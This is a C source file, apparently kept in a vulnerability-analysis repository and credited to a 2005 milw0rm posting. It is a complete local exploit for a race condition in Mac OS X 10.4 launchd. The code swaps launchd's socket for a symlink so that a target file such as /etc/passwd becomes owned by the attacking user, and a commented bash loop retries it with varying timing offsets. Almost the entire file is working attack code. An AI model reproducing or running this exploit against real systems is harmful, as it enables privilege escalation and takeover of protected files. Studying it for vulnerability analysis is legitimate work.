lilbool/vuln-code-analysis
0
1/*
2 * Mac OS X 10.4 launchd race condition exploit
3 *
4 * intropy (intropy <at> caughq.org)
5 */
6
7/* .sh script to help with the offsets /str0ke
8#!/bin/bash
9
10X=1000
11Y=3000
12I=1
13
14while ((1))
15do
16 ./CAU-launchd /etc/passwd $X
17 if [ $I -lt 30 ]
18 then
19 ((X=$X+$Y))
20 ((I=$I+1))
21 else
22 X=1000
23 I=1
24 fi
25done
26*/
27
28#include <stdio.h>
29#include <stdlib.h>
30#include <string.h>
31#include <unistd.h>
32#include <sys/types.h>
33#include <sys/stat.h>
34
35#define DEBUG 0
36#define SLEEP 6000
37
38main(int argc, char *argv[])
39{
40 pid_t pid;
41 int count, sleep = SLEEP;
42 char name[100];
43 char target[100];
44 struct stat *stats = (struct stat *)malloc(sizeof(struct stat));
45
46 if ( argc < 2) {
47 fprintf(stderr, "%s <file to 0wn>\n", argv[0]);
48 exit(-1);
49 } else if ( argc > 2 ) {
50 sleep = atoi(argv[2]);
51 strncpy(target, argv[1], sizeof(target)-1);
52 } else {
53 strncpy(target, argv[1], sizeof(target)-1);
54 }
55
56 if ( DEBUG ) printf("Going for %s\n", target);
57 if ( DEBUG ) printf("Using usleep %d\n", sleep);
58
59 pid = fork();
60
61 if ( pid == 0 ) {
62 if ( DEBUG ) {
63 system("/sbin/launchd -v /bin/ls -R /var/launchd/ 2>/dev/null");
64 } else {
65 system("/sbin/launchd -v /bin/ls -R /var/launchd/ >/dev/null 2>&1");
66 }
67 } else {
68 snprintf(name, sizeof(name)-1, "/var/launchd/%d.%d/sock", getuid(), pid+2);
69 if ( DEBUG ) printf("Checking %s\n", name);
70 usleep(sleep);
71 if ( DEBUG ) printf("Removing sock...\n");
72 if ( (unlink(name)) != 0 ) {
73 if ( DEBUG ) perror("unlink");
74 } else {
75 if ( (symlink(target, name)) != 0 ) {
76 if ( DEBUG ) perror("symlink");
77 } else {
78 if ( DEBUG ) printf("Created symlink %s -> %s...\n", name, target);
79 }
80 }
81 stat(target, stats);
82 if ( stats->st_uid == getuid() ) {
83 printf("Looks like we got it\n");
84 usleep(10000000);
85 }
86 }
87}
88
89// milw0rm.com [2005-06-14]